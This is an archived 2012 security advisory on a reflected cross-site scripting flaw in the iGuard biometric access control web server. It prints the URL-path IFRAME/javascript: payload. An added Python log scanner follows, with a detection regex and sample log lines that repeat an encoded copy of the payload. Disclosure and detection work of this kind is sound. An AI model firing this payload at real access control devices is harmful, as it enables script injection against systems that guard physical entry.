iGuard Security Access Control System Cross Site Scripting

Date: 02 May 2012
Reported by: Usman Saeed
Type: packetstorm
Source: packetstormsecurity.com

iGuard Biometrics Access Control Webserver XSS, Medium Severity

Code
`Title  
====  
iGuard Security Access Control System Webserver, Cross Site Scripting (XSS)  
  
  
Author  
======  
  
Usman Saeed, Xc0re Security Research Group  
  
Website : http://www.xc0re.net  
  
Twitter : http://twitter.com/xc0resecurity  
  
Blog : http://www.xc0re.net/blog  
  
Published : http://www.xc0re.net/index.php?p=1_25_iGuard-Biometrics-Access-Control-Webserver-XSS  
  
  
Date  
====  
2nd May, 2012  
  
  
  
Severity:  
=========  
Medium  
  
  
  
Description  
===========  
iGuard Biometrics Access Control (or iGuard Security Access Control System) has a cross-site scripting vulnerability in its embedded web server, iGuard Embedded Web Server/3.6.7427A.  
  
  
  
Previous Vulnerability  
======================  
A previous cross-site scripting vulnerability in iGuard Biometrics Access Control was discovered in 2011; it was caused by improper validation of user-supplied input by the month, record and department modules.  
  
  
  
  
Target iGuard System Specifications  
===================================  
  
Device Firmware Version : 3.6.7427A   
  
Device WebServer : iGuard Embedded Web Server/3.6.7427A   
  
  
  
Tested on   
=========  
  
Windows 7 Professional   
  
  
Browser Used  
=============  
Mozilla Firefox 12.0   
  
  
Vector  
======  
  
http://[Remote host]/></font><IFRAME SRC="JAVASCRIPT:alert('XSS Found by Usman Saeed , Xc0re Security Research Group');">.asp  
  
  
  
  
  
  
Copyright © 2012| Xc0re Security Research Group  
  
  
  
`
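
A log check for requests shaped like the vector above, added here as an example (it is not from the advisory or the vendor): it percent-decodes the URL path and flags markup characters or a javascript: scheme. The common log format, a logging proxy in front of the device, the page names and all sample lines are assumptions.

```python
import re
from urllib.parse import unquote

# Request field of a common-log-format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>.*) HTTP/\d(?:\.\d)?"')
# Markup or a script scheme has no place in a URL path
MARKUP_RE = re.compile(r'[<>"]|javascript\s*:', re.IGNORECASE)

# Constructed sample log lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [02/May/2012:10:00:01 +0000] "GET /index.asp HTTP/1.1" 200 5120',
    '192.0.2.44 - - [02/May/2012:10:02:17 +0000] '
    '"GET /%3E%3C/font%3E%3CIFRAME%20SRC=%22JAVASCRIPT:alert(1);%22%3E.asp HTTP/1.1" 404 312',
    '192.0.2.45 - - [02/May/2012:10:03:40 +0000] "GET /%253Cb%253Etest.asp HTTP/1.1" 404 300',
    '192.0.2.10 - - [02/May/2012:10:05:09 +0000] "GET /report.asp?month=5 HTTP/1.1" 200 2048',
]

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path(log_line):
    """Return the decoded URL path if it carries markup, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    path = match.group("target").split("?", 1)[0]  # the vector lives in the path
    decoded = decode_fully(path)
    return decoded if MARKUP_RE.search(decoded) else None

def scan(lines):
    """Return (client_ip, decoded_path) for every flagged request."""
    hits = []
    for line in lines:
        path = suspicious_path(line)
        if path is not None:
            hits.append((line.split(" ", 1)[0], path))
    return hits

if __name__ == "__main__":
    for ip, path in scan(SAMPLE_LOG):
        print(f"{ip} requested path with markup: {path!r}")
```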
